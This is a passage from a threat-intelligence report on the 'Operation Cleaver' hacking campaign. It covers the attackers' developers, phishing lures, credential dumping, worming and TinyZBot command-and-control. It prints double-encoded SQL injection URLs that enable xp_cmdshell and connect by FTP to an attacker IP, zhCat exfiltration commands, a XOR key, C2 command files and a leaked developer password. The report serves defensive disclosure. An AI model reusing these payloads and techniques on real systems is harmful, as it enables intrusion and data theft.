a version control system is indicative of code sharing, but the use of an older system like Subversion, along with other evidence, suggests there is not a large amount of collaboration on projects and likely one developer working on each project at a time. This is not behavior typical of a professional development team. OPERATION CLEAVER 28 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Alireza (cont.) Alireza\xe2\x80\x99s C# tools include the following techniques: \xe2\x80\xa2 Querying Windows Management Instrumentation Command-line (WMIC) \xe2\x80\xa2 Cached credential dumping \xe2\x80\xa2 Generating ASPX shells \xe2\x80\xa2 Encryption \xe2\x80\xa2 Process enumeration Alireza\xe2\x80\x99s Java tools include the following techniques: \xe2\x80\xa2 HTTP communications \xe2\x80\xa2 GUI development Alireza\xe2\x80\x99s C++ tools include the following techniques: \xe2\x80\xa2 WinPcap interface \xe2\x80\xa2 ARP poisoning \xe2\x80\xa2 HTTP communications \xe2\x80\xa2 SMB communications PDBs \xe2\x80\xa2 C:\\Users\\alireza\\Documents\\Visual Studio 2010\\CPPProjects\\IDCSercive\\ trunk\\Release\\kagent.pdb \xe2\x80\xa2 C:\\Users\\alireza\\Documents\\Visual Studio 2010\\CPPProjects\\ PcapServiceInstaller\\Release\\PcapServiceInstaller.pdb \xe2\x80\xa2 C:\\Users\\alireza\\Documents\\Visual Studio 2010\\Projects\\ AntiVirusDetectorConsole\\AntiVirusDetectorConsole\\obj\\x86\\Release\\ AntiVirusDetectorConsole.pdb \xe2\x80\xa2 C:\\Users\\alireza\\Documents\\Visual Studio 2010\\Projects\\ mimikatzWrapper\\mimikatzWrapper\\obj\\x86\\Debug\\mimikatzWrapper.pdb \xe2\x80\xa2 C:\\Users\\alireza\\Documents\\Visual Studio 2010\\Projects\\ShellCreator2\\ ShellCreator2\\obj\\x86\\Debug\\ShellCreator2.pdb \xe2\x80\xa2 c:\\Users\\alireza\\Documents\\Visual Studio 2012\\Projects\\BackDoorLogger\\ BackDoorLogger\\obj\\Debug\\BackDoorLogger.pdb #OPCLEAVER 29 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 kaJ kaJ is a .NET developer, and has only been observed working in C#. He has less English language proficiency than others in the organization, and likely has a supplemental role during compromises. He has been observed developing tools which cater to specific challenges in a compromise. His notable project was named Net Crawler, and a technical analysis of this tool can be found in the Tactics, Techniques and Procedures section. Thanks to a recovered test configuration for Net Crawler, we were able to determine that kaJ\xe2\x80\x99s development computer has the name dev-castle, where he has the username kaJ and the password oaolrJ@vad. kaJ is believed to be the creator of the Zhoupin ASCII art displayed in Net Crawler. kaJ\xe2\x80\x99s projects include the following techniques. \xe2\x80\xa2 Interfacing with multiple cached credential dumping tools \xe2\x80\xa2 Interfacing with PsExec \xe2\x80\xa2 Worming behavior Jimbp Jimbp is a .NET developer with minimal experience. His projects appear to be supplemental to TinyZBot and are very simplistic. It is believed he is the developer of the project Binder_1. This project was a simple malware binder which required manual configuration when compiling. His other work included creating a new service wrapper for TinyZBot. PDBs \xe2\x80\xa2 c:\\Users\\Jimbp\\Desktop\\Binder_1\\Binder_1\\obj\\x86\\Release\\Setup.pdb \xe2\x80\xa2 c:\\Users\\Jimbp\\Desktop\\Binder_1 - for cleaver\\Binder_1\\obj\\x86\\ Release\\Setup.pdb \xe2\x80\xa2 c:\\Users\\Jimbp\\Documents\\Visual Studio 2013\\Projects\\ TestForInstallingService\\TestForInstallingService\\obj\\Release\\ TestForInstallingService.pdb OPERATION CLEAVER 30 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TEAMS Of course many associated Iranian hacker teams have been identified in public and private security circles. Some of the teams publicly known today include Iranian Cyber Army, Ashiyane, Islamic Cyber Resistance Group, Izz ad-Din al-Qassam Cyber Fighters, Parastoo, Shabgard, Iran Black Hats and many others9. However, even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army (botnets), Ashiyane (SQL injection) and Syrian Electronic Army (phishing and RATs), we believe this is largely the work of a new team. Some connections to Ashiyane were discovered in our investigations including a reference to hussein1363, who had prior ties to the hacker group. Additional connections between team members and individuals exist but are predominantly speculative and have only been shared with law enforcement. Ultimately we believe the Cleaver team is a mix of existing team members and new recruits pulled from the universities in Iran. #OPCLEAVER 31 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 TTP COVER HERE TACTICS, TECHNIQUES #OPCLEAVER & PROCEDURES 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 32 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TACTICS, TECHNIQUES & PROCEDURES The Cleaver campaign used a variety of methods in multiple stages of attacks. In this section we\xe2\x80\x99ll cover the commonly observed methods during different stages of the attack. INITIAL COMPROMISE The initial compromise gets the attackers their first foothold into the target network. Once the ability to execute arbitrary code has been established, an attacker\xe2\x80\x99s job becomes quite a bit easier. Since the vector of initial compromise is usually determined by what is vulnerable on the target, we\xe2\x80\x99ll cover just a few of the techniques we\xe2\x80\x99ve seen Operation Cleaver use to initiate the compromise. SQL Injection SQL injection is a very common and simple attack method. It is made possible by a lack of input sanitization by the vulnerable application before supplying that input into a SQL database query. SQL injection payloads used by this organization have been double encoded. Double encoding SQL injection payloads allows for bypassing of various anti-exploitation filters, such as those supplied by Web Application Firewalls (WAFs). The attackers would enable xp_cmdshell: http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_ cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo. sp_configure%20@b2,%201;RECONFIGURE;--%20 Then connect outbound via anonymous FTP: http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@ b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%20 Spear-Phishing Campaign Using messaging methods such as email, attackers can social engineer users into downloading and executing software, which quietly installs malware alongside of the desired program. Operation Cleaver has employed this technique numerous times across different organizations. #OPCLEAVER 33 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 EasyResumeCreatorPro.com The domain EasyResumeCreatorPro.com was registered and a website setup which was a direct copy of a legitimate website at winresume.com. This is how the original site looked: That\xe2\x80\x99s not all they copied. In order to infect users, they combined the original Easy Resume Creator Pro product with malware by using a binder they developed internally named Binder_1. A binder is an application, which combines two executables (desired software and malware) into a single executable. The resulting executable masquerades as the desired software. The purpose is deception, to make the binder indistinguishable from the desired application. When executed, both applications are written to a temporary directory and executed. This way it appears that the desired application was executed, but the malware was also executed silently. Figure 14: The original Easy R\xc3\xa9sum\xc3\xa9 Creator Pro website on winresume.com is legitimate. Figure 15: The fraudulent website, easyresumecreatorpro.com, is a fraudulent copy of the Easy Resume Creator Pro website to lure job candidates to download and install their TinyZBot agent. OPERATION CLEAVER 34 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Teledyne R\xc3\xa9sum\xc3\xa9 Submitter This attack evolved to appear more legitimate. The attackers made the victims feel like they had a pending job opportunity at the industrial conglomerate Teledyne. In order to take advantage of this job opportunity, the victim needed to use the fake r\xc3\xa9sum\xc3\xa9 submission application supplied by the malicious recruiter. Multiple domains were registered in order to make the download sites seem more realistic. These domains included other companies as they tried to hit a wider audience. \xe2\x80\xa2 Teledyne-Jobs.com \xe2\x80\xa2 Doosan-Job.com \xe2\x80\xa2 NorthropGrumman.net At this point, the r\xc3\xa9sum\xc3\xa9 submission application checks the Internet connection. If it is unable to connect to the Internet, it will display a window to input proxy information. When this information is entered, the results are cached in a location the dropped malware can access. After an Internet connection is ensured, the malware (TinyZbot) is dropped and executed. This clever scheme makes sure the malware can connect to the command and control server, and increases the chances that domain credentials are cached on the now infected machine. Shortly after, the main application is launched. Figure 16: When the r\xc3\xa9sum\xc3\xa9 submitting application is executed, a splash screen is displayed. Figure 17: Unable to connect to the Internet, the tool prompts the user for proxy configuration information. Figure 18: Final r\xc3\xa9sum\xc3\xa9 submission form displays to the user while the malware runs freely in the background. #OPCLEAVER 35 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Teledyne R\xc3\xa9sum\xc3\xa9 Submitter (cont.) The first r\xc3\xa9sum\xc3\xa9 submission form requests contact information. This form, like the rest of the submission forms, only stores the submitted information while the application is running. As the infected user is going through and filling out all this information, the malware is running in the background, logging their keystrokes, retrieving their stored passwords, etc. Once all the forms are filled out, the user goes to the submission form. When the victim hits submit, the r\xc3\xa9sum\xc3\xa9 submitter does a GET request to microsoft.com in order to make it seem like it is submitting something, then claims success. This method is particularly effective not only because of its level of deception, but even if the victim suspects that they are infected with malware, they are not as likely to speak up about it, as they would need to explain why they were submitting a job application for another company. Figure 19: GET request to www.microsoft.com fakes the r\xc3\xa9sum\xc3\xa9 submission. OPERATION CLEAVER 36 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 PRIVILEGE ESCALATION & PIVOTING Privilege escalation is a category of techniques that describe the process of going from a less privileged user on a compromised computer to a more privileged user. This increase in privileges allows for the attacker to gain access to privleged areas of the operating system as well as to infect other computers on the target network. This team did not utilize any novel methods of privilege escalation, but they were observed using a variety of publicly known exploits. PrivEsc is a compiled exploit, which leverages the vulnerability commonly referred to as KiTrap0D (CVE-2010-0232). The exploit allows for escalation of privileges on unpatched Windows operating systems from an unprivileged user to kernel-level privilege. This vulnerability and the corresponding exploit were discovered and developed in 2010. The plagiarized version used in Operation Cleaver was compiled in May 2013, with a slight modification to the public source code. This modification changed the author\xe2\x80\x99s details to Zhopin Exploit Team. Pivoting is the process of leveraging access from one compromised computer in order to gain access to additional systems on the target network. This can involve launching attacks from the compromised computer, or simply abusing access once it has been gained. Cached Credential Dumping A very common method of pivoting on a predominantly Windows operating system based network is to extract domain credentials which have been used on the compromised computer from a credential cache. There are a few well-known tools which are capable of doing this given sufficient privileges on the infected host. Two of these tools used by Cleaver are Mimikatz and Windows Credential Editor. zhMimikatz and MimikatzWrapper Two similar applications were developed by Operation Cleaver in order automate the execution of Mimikatz. These applications are zhMimikatz and MimikatzWrapper. These applications store multiple versions of Mimikatz in their resources. When executed, they determine which version of Mimikatz to use based on whether the computer\xe2\x80\x99s version of Windows is 32-bit or 64-bit. This technique is uncommon in malware and shows the advanced skillset of the Cleaver team. Both tools were developed in C#. #OPCLEAVER 37 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 zhMimikatz and MimikatzWrapper (cont.) In the following examples, the computer name is TheComputerName, the username of the logged in user is TheUser, and that user\xe2\x80\x99s password is ThePassword. At the time of execution, the system only has its own credentials available and no cached network credentials. zhMimikatz zhMimikatz executes the correct version of Mimikatz for the current system, and parses the results for any cached credentials. Figure 20: zhMimikatz OPERATION CLEAVER 38 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 MimikatzWrapper Output from MimikatzWrapper is essentially the same as zhMimikatz, despite being a different Visual Studio project. The only external difference is that MimikatzWrapper also logs these results to res.txt in the executing directory. This can make it useful for tools like the PVZ tool chain and Csext to execute with logged results: Figure 22: The MimikatzWrapper dumps credentials out to a file. Figure 21: The MimikatzWrapper. #OPCLEAVER 39 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 PsExec Spreading Once an attacker has credentials extracted from the cache, whether in hash form or in plaintext form, PsExec can be used to run commands on any other computer which accepts those domain credentials. If this technique is combined with cached credential dumping, it can be used to jump from computer to computer on a compromised network. NetC (Net Crawler) Net Crawler utilizes a cached credential dumping technique along with PsExec in order to worm throughout a network, collecting any and all credentials that it can extract from credential caches. It has the ability to do this with both Windows Credential Editor and Mimikatz. It starts by first extracting cached credentials from the infected computer\xe2\x80\x99s cache. Once this is complete, it then continues to scan a set of configured IP addresses on the local subnet to determine which IP addresses have SMB related ports open. Then an iterative methodology is applied to brute forcing each SMB enabled target with each credential that was extracted from the cache. When a positive result has been achieved, it will create a copy of itself with a modified configuration stored as a PE resource, then send and execute the copy utilizing PsExec. This copy repeats the behavior of the original, but with already discovered credentials as well as newly discovered ones on the newly infected host. Any credentials found are reported back to the original infection. OPERATION CLEAVER 40 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 NetC (Net Crawler) cont. The following is a sample of some of the recovered results of Net Crawler executing on a live network: A more in depth analysis of Net Crawler, as part of the A Study in Bots series, will be available on Cylance\xe2\x80\x99s blog. Figure 23: The real output of a successfully run NetC effort at a victim organization. #OPCLEAVER 41 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 MS08-067 Exploit MS08-067 is a vulnerability in Microsoft Windows made popular by the Conficker worm which can be exploited by a specially crafted packet to the operating system\xe2\x80\x99s RPC network interface. This vulnerability has been patched since October 2008, but many networks have failed to update their systems even to this day. Operation Cleaver used a plagiarized version of a publicly available exploit for this vulnerability developed in Python. Someone in the Cleaver team (presumed to be Nesha) modified the exploit to read \xe2\x80\x9cBy Nesha\xe2\x80\x9d. Jasus Jasus is an ARP cache poisoner developed by the Operation Cleaver team. It makes use of WinPcap and is developed in C. Compared to some other publicly available ARP cache poisoning utilities, Jasus is poorly developed and without many useful features. The primary positive attribute of Jasus is its poor detection ratio by the antivirus industry. Cain & Abel Cain & Abel is a publicly available toolkit, which covers a wide range of functionality that assists attackers once they have compromised a node on a network. It has the ability to dump stored and cached credentials, and conduct attacks like ARP cache poisoning in order to capture credentials being transmitted on the network. It also has a remotely installable trojan named Abel, which enables some of its functionality on a remote target. We observed the Operation Cleaver team using Cain & Abel for extracting credentials from caches and the network when they are confident that there is little to no antivirus protection on the infected target. EXFILTRATION Exfiltration is the process of moving information to an external site. In this context, it is the process of stealing information without being detected. Operation Cleaver has a strong focus on stealing confidential/privileged information, and they have utilized a few methods in order to facilitate this objective. OPERATION CLEAVER 42 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Anonymous FTP Servers Cleaver Operations observed in 2013 mainly utilized FTP servers with anonymous access enabled in order to pilfer large quantities of information. This allowed them to use existing command line utilities available on their targets in order to upload information. This is a versatile technique as it does not require any additional software which could be detected. These FTP servers were also observed during the infection process, as infected computers were often instructed to download additional files from these FTP servers, including backdoors and pivoting tools. The following IP addresses hosted FTP servers that were used in the infection of targets or in the exfiltration of information. \xe2\x80\xa2 108.175.152.230 \xe2\x80\x93 Santa Rosa, CA, USA \xe2\x80\xa2 108.175.153.158 \xe2\x80\x93 Santa Rosa, CA, USA \xe2\x80\xa2 184.82.181.48 \xe2\x80\x93 Pilot Mountain, North Carolina, USA \xe2\x80\xa2 203.150.224.249 - Thailand \xe2\x80\xa2 64.120.208.74 - Pilot Mountain, North Carolina, USA \xe2\x80\xa2 64.120.208.75 - Pilot Mountain, North Carolina, USA \xe2\x80\xa2 64.120.208.76 - Pilot Mountain, North Carolina, USA \xe2\x80\xa2 64.120.208.78 - Pilot Mountain, North Carolina, USA \xe2\x80\xa2 66.96.252.198 - Pilot Mountain, North Carolina, USA NetCat NetCat is a network tool which has many valid purposes but can also be used for malicious purposes. Its main functionality allows for a client and server communication channel, allowing for information to be transported over the network simply. NetCat has an option when being compiled to enable or disable the ability for NetCat to execute a command after the connection is established. This feature can be abused to enable a reverse connecting shell, which can be used to remotely control a target. NetCat\xe2\x80\x99s network communications are in plaintext, and could be viewed by an egress filter looking to block the exfiltration of sensitive information. The Operation Cleaver team was observed attempting to use NetCat to exfiltrate information as well as use it as a reverse connecting shell. The use of NetCat was later replaced with zhCat. #OPCLEAVER 43 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 zhCat zhCat is a tool developed by the Operation Cleaver team which operates similarly to NetCat. Its main purpose is to create a channel that is capable of transporting information over the network. The changes made in zhCat allow for this information to be transferred with inline obfuscation and/ or encryption. This makes it more difficult to detect that privileged information is being exfiltrated. The command line help (of a particular version) shows the following options: Multiple obfuscation/encryption methods are available. The \xe2\x80\x93h argument enables HTTP mode. This makes the traffic between zhCat instances look like benign HTTP traffic. For instance, if the attackers set up a zhCat instance listening on port 1000 on 192.168.116.128 in HTTP mode, the client instance of zhCat would use the following command: zhcat.exe \xe2\x80\x93h \xe2\x80\x93p 1000 \xe2\x80\x93i 192.168.116.128 The server instance would use the following command: zhcat.exe \xe2\x80\x93l \xe2\x80\x93h \xe2\x80\x93p 1000 When we run both of these, we can send information just by typing it into the terminal of the running application. Information can be supplied by standard input. OPERATION CLEAVER 44 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 zhCat (cont.) If we observe the network communications during this transfer, we can see the following HTTP POST request. Note: research into ebizmba.com did not turn up any additional evidence of being involved with the development of zhCat. On the server side, we can see our message has been received: If stricter egress filtering is enabled, the attackers can use zhCat to also XOR encrypt the traffic with a shared key. These keys are stored inside zhCat. The following is the key used for XOR encryption: Sorry! The handle to file %s is not a valid handle any more.\\nSorry! The handle to file %s is not a valid handle any more. The \\n represents hex character 0x0A, which is a new line character. An attacker could set up a server instance of zhCat with the following command in order to enable both HTTP and XOR obfuscation: zhcat.exe \xe2\x80\x93h \xe2\x80\x93p 1000 \xe2\x80\x93l \xe2\x80\x93x The client instance could then be invoked with the following command: zhcat.exe \xe2\x80\x93h \xe2\x80\x93p 1000 \xe2\x80\x93i 192.168.116.128 \xe2\x80\x93x Once again, information can be supplied via standard input. #OPCLEAVER 45 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 zhCat (cont.) Upon inspecting the network traffic again, we see the following HTTP POST request. On the server side, we can see this information being received: zhCat has a variety of other features such as port mirroring as well as traffic redirecting. PLink PLink is one of the many utilities provided in the PuTTY (SSH) suite, which has many benign purposes. It is capable of communicating over various protocols, the most notable being SSH. The SSH protocol is a heavily utilized encrypted protocol, most commonly used for remote administration of UNIX based operating systems. PLink is designed to implement some of the SSH functions related to forwarding traffic as well as other functionality. Operation Cleaver uses PLink to forward local RDP ports to remote SSH servers. This allows them to easily connect to RDP servers inside the networks of their victims. These RDP connections can be used to exfiltrate information visually, as well as to remotely control the computers hosting the RDP servers. OPERATION CLEAVER 46 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 SMTP Early Cleaver operations abused SMTP in order to exfiltrate information. The sending is performed by internally developed malware samples such as TinyZBot and Csext in order to exfiltrate information about the infected computer, as well as requested files and keystroke logging information. Messages were sent using an open SMTP relay at BeyondSys.com with the sender email address dyanachear(at)beyondsys.com. This allowed the attackers to use infrastructure that was not theirs to exfiltrate information. The known recipient addresses of this information were testmail_00001(at)yahoo.com and TerafficAnalyzer(at)yahoo. com. In order to deceive anyone reading these emails, they made them appear to be a spam message that most would not think twice about. The subject used is the following: No Prescription required. Viagra Dosages: 25, 100, 150mg. Fast worldwide delivery. The message used is the following: Buy Viagra150mg x 50 tablets for only $124.99! No Prescription required. Viagra dosages: 150, 100, 25mg. Fast Worldwide Delivery. See the attachment movie. Free bonus trip. bestviagra4u.cn The files being exfiltrated are added to the email as attachments. SOAP SOAP is a sub-protocol communicated via HTTP. In relation to Operation Cleaver, it is used as the command and control protocol for TinyZBot, which was the preferred backdoor, and underwent long-term development. HTTP communications are often used by botnets, but it is uncommon to use a sub-protocol such as SOAP. It is likely that SOAP was used because it is simple to implement in C#, and has the added benefit of blending in with other benign HTTP traffic. As part of TinyZBot\xe2\x80\x99s command and control protocol, files can be exfiltrated over SOAP to the command and control server. For more information about TinyZBot, see the Persistence section. #OPCLEAVER 47 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 PERSISTENCE Persistence is the means of maintaining access to a compromised network. There are limitless methods of persistence; the following are techniques and tools for persistence used by Cleaver. TinyZBot TinyZBot is a backdoor developed in C#. This bot is the longest developed malware we have analyzed from this organization. The earliest known version was compiled in January 2013 and we continued to see new versions being created actively. The purpose of TinyZBot is to gather information from an infected computer as well as maintain and further access into a compromised network. TinyZBot was developed with the clear intention of targeted campaigns. The name TinyZBot is assumed to be referring to this project as a less versatile version of the ZeuS botnet, although it does not exhibit the major browser injection features of ZeuS. To be clear, TinyZBot shares no code with ZeuS or its variants, and is developed in a different programming language. The majority of the code in TinyZBot was created by Cleaver. TinyZBot Features TinyZBot supports a wide array of features that continually evolved over time. For the evolution of features, see the History section. The following is a list of supported features: \xe2\x80\xa2 SMTP exfiltration \xe2\x80\xa2 Log keystrokes \xe2\x80\xa2 Monitor clipboard activity \xe2\x80\xa2 Enable a SOAP-based command and control channel \xe2\x80\xa2 Self-updating \xe2\x80\xa2 Download and execute arbitrary code \xe2\x80\xa2 Capture screenshots \xe2\x80\xa2 Extract saved passwords for Internet Explorer \xe2\x80\xa2 Install as a service \xe2\x80\xa2 Establish persistence by shortcut in startup folder \xe2\x80\xa2 Provide unique malware campaign identifiers for tracking and control purposes \xe2\x80\xa2 Deceptive execution methods \xe2\x80\xa2 Dynamic backdoor configuration \xe2\x80\xa2 FTP exfiltration \xe2\x80\xa2 Security software detection \xe2\x80\xa2 Ability to disable Avira antivirus \xe2\x80\xa2 Ability to modify PE resources \xe2\x80\xa2 Dynamic plugin structure OPERATION CLEAVER 48 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TinyZBot Command and Control Protocol The command and control mechanism for TinyZBot utilizes SOAP communicating over HTTP. Potential reasons for using SOAP are: 1. SOAP-based communications are simple to implement in C#. 2. SOAP traffic could easily be considered benign traffic, as it is not commonly seen in malware. As part of SOAP communications, a URI is specified. This is internal to the sub-protocol, and does not necessarily reflect the URI of the host running the SOAP server (ASMX file). In the case of TinyZBot, and many examples for developing SOAP applications, this URI is tempuri.org. Since the first version of the SOAP-based command and control protocol was implemented, TinyZBot used what is referred to as a \xe2\x80\x9cdynamic password\xe2\x80\x9d. The result of this is a cryptographically hashed version of the server time (which must be obtained through a SOAP query), the TinyZBot\xe2\x80\x99s GUID, and the TinyZBot\xe2\x80\x99s AppUsageID (campaign identifier). For the command and control examples below, red text represents TCP data sent from the TinyZBot infection while blue text represents TCP data sent from the command and control server. The server time lookup query invokes the SOAP command GetServerTime. POST /checkupdate.asmx HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433) Content-Type: text/xml; charset=utf-8 SOAPAction: \xe2\x80\x9chttp://tempuri(dot)org/GetServerTime\xe2\x80\x9d Host: microsoftactiveservices(dot)com Content-Length: 291 Expect: 100-continue Connection: Keep-Alive HTTP/1.1 100 Continue 2014-10-06T13:36:47.2193601Z 00cf6217-8c7e-4598- b155-65ebd949bba9 XYZCO abefc81 BDFF;1.0.0 OPERATION CLEAVER 50 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TinyZBot Command and Control Protocol (cont.) [ALL]__b93c-49a1-140914084450__[0000000000000000000000000000 0000].tmu [ALL]__b93c-49a1-140914084612__[0000000000000000000000000000 0000].tmu [ALL]__b93c-49a1-140914084619__[00000000000000000000000000000 000].tmu [ALL]__b93c-49a1-140914084628__[00000000000000000000000000000 000].tmu [ALL]__b93c-49a1-140914084638__[00000000000000000000000000000 000].tmu [ALL]__b93c-49a1-140914084644__[00000000000000000000000000000 000].tmu [ALL]__b93c-49a1-140914084659__[000000000000000000000000000000 00].tmu [ALL]__b93c-49a1-140914084715__[0000000000000000000000000000000 0].tmu [ALL]__b93c-49a1-140914084732__[00000000000000000000000000000000 ].tmu [ALL]__b93c-49a1-140914084741__[00000000000000000000000000000000]. tmu [ALL]__b93c-49a1-140914090807__[00000000000000000000000000000000].tmu[ALL]__b93c-49a1-140915103605__[00000000000000000000000000000000].tmu[ALL]__b93c-49a1-140915103610__[00000000000000000000000000000000].tmu 00cf6217-8c7e-4598-b155-65ebd949bba9XYZCO abefc81 [ALL]__b93c-49a1-140914084450__ [00000000000000000000000000000000].tmu HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 06 Oct 2014 13:36:47 GMT Content-Length: 652 OzIwMTQwOTE0X18wODQ0NTANClJVTkNNRD1jbWQuZXhlLC9DIGlwY29uZmlnIC9hbGwgP j4gIltJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dCIgMj4mMQ0KV VBMT0FEPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA0KREVMR VRFPVtJTkZPTERFUl1cZDJkYjY5NmEtMzM2Ny00Njk5LWE4MTUtZGYwOTA5OGJjNTk2LnR4dA== #OPCLEAVER 51 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 TinyZBot Command and Control Protocol (cont.) The command file downloaded in this example is as follows: ;20140914__084450 RUNCMD=cmd.exe,/C ipconfig /all >> \xe2\x80\x9c[INFOLDER]\\d2db696a-3367-4699-a815-df09098bc596.txt\xe2\x80\x9d2>&1 UPLOAD=[INFOLDER]\\d2db696a-3367-4699-a815-df09098bc596.txt DELETE=[INFOLDER]\\d2db696a-3367-4699-a815-df09098bc596.txt The first line is a timestamp of the command. The TinyZBot command parser ignores it. The RUNCMD line requests that cmd.exe be executed, with the command ipconfig /all being redirected to a file in a directory designated for files to be uploaded. The UPLOAD command requests that this file is then uploaded over SOAP to the command and control server. The DELETE command then requests that the file be deleted from the infected system. The following is a list of supported commands that TinyZBot responds to: COPY REPLACE DELETE UPLOAD FUPLOAD CLEARFILES CLEAROUPUTFOLDER SAVECONFIG SAVETOCFGFILE RESTART RestartForce Commands such as GETINFO are often run on newly infected systems, as they decide whether the infection has hit the correct target. There are additional SOAP commands, but they will not be covered in detail. The following is a list of all the SOAP commands: CheckFileMD5, GetFile, GetFileList, GetServerTime, UploadFile. Deception TinyZBot is commonly installed using some form of deception. Recent versions use the resume- based methods reported in the Initial Compromise sections. An additional method was used for earlier versions. When early versions of TinyZBot were executed, they opened an image stored in the resource section of the executable and copied the malicious TinyZBot executable to the %AppData% directory. Many of the images identified were of the popular Lebanese singer and actress Haifa Wehbe. The backdoor additionally replaced the original malicious executable with an appropriately named image file and padded the image file with null bytes in order to mirror the original file size. KILL DEEPKILL EXIT EXITFORCE RUNAVDETECTOR RUNWAIT RUNCMD UCMD GETINFO GETSCREENSHOTHQ GETSCREENSHOT CREATEUPLOADLIST FORCERESTART FORCEEXIT UNLOADMODULE RELOADMODULE LOADMODULE UNLOADM RELOADM REMOVEM UNLOADALL RELOADALL ADDSEC REMSEC ADDKV CHGKV REMKV ADDK REMOVEK OPERATION CLEAVER 52 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 History The earliest known version on TinyZBot was compiled on January 27, 2013. This early version had very little functionality. It was limited to logging keystroke data, sending emails, and creating a link in the user\xe2\x80\x99s startup folder for persistence. Its method of exfiltrating the logged keystrokes relied upon a hardcoded email address stored in the binary. The sender email address was dyanachear(at)beyondsys.com and emails were destined for testmail_00001(at) yahoo.com. The message was intended to look like common Viagra spam from China, but would be sent with the keystroke logging data as attachments, as well as system information. The initial version did not provide any means of receiving commands and was obfuscated with SmartAssembly. The following iteration compiled on March 12, 2013, only contained minor bug fixes. The next version was compiled on April 24, 2013. This version starts to look more like an average bot. A command and control protocol was established, using HTTP and SOAP for the protocol. The command and control server for this version was located at 173.192.144.68/ DefaultWS(dot)asmx. This new command and control protocol allowed for the addition of quite a few other features. An update mechanism was added, and could be regularly scheduled, so unassisted periodic update checks were automatically performed. The SOAP API used a dynamic password mechanism, which required the computation of a simple key in order to access certain parts of the API. The email data exfiltration method also underwent modification to be activated at a scheduled interval. There were also some changes, which looked to be bug fixes, such as limiting the number of times sending an email could fail. The next day, April 25, 2013, a new version was compiled which allowed for self-deletion. On May 14, 2013, we noticed a change which assisted in the identification of active targets. The AppUsageId (at this point named AppType) was an identifier used by this organization in order to differentiate between targets infected with TinyZBot, meaning they could effectively run multiple campaigns using the same command and control server and know which target was infected. This also allowed for separate commands to be supplied to different targets without the need for per-bot commands. At this time, the AppUsageId was total0, but later we observed names, which aligned with active targets. The exfiltration email address was also changed to TerafficAnalyzer(at)yahoo.com. On June 17, 2013, there was an addition that allowed for the loading of configuration data from the PE\xe2\x80\x99s resources. At this time, it was limited to the exfiltration email address. This version was not obfuscated with SmartAssembly #OPCLEAVER 53 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 History (cont.) We do not see a new version of TinyZBot until June 7, 2014. There are quite a few notable improvements, but nowhere near enough to indicate consistent development on the project for a year. SmartAssembly was reused again. A method was added to detect what security related software is installed. Avira antivirus was specifically targeted and disabled, due to its detection of the new keystroke logger module added in this version. This keystroke logger source is publicly available and referred to as DeadkeyLogger. A new string encryption class is added, but the code was copied and pasted from a Microsoft example. The ability to extract Internet Explorer passwords was added. Clipboard monitoring code was added, but not invoked. The emailing features were removed, but the classes which previously contained them were still present but empty. Many more options were enabled to be loaded from PE resources. The ability to add PE resources was added. Another version was compiled on June 7, 2014, with no feature difference. On June 17, 2014, we see the first instance of Binder_1, which is aptly named, as it is a binder. The legitimate application used in this version of Binder_1 was compiled on August 22, 2013, and is a self-extracting archive of desktop wallpapers, including an image from the game Mirror\xe2\x80\x99s Edge. The TinyZBot included was the version compiled on June 7, 2014. The version compiled on June 23, 2014, added functionality which allowed screenshots of the desktop to be taken. On August 2, 2014, we see another version without SmartAssembly obfuscation. A bug fix is made to the keystroke logging method, and clipboard monitoring is enabled. Three items were compiled on August 18, 2014. Two of them are TinyZBot binaries, which contain a minor key logging bug fix. The third is a 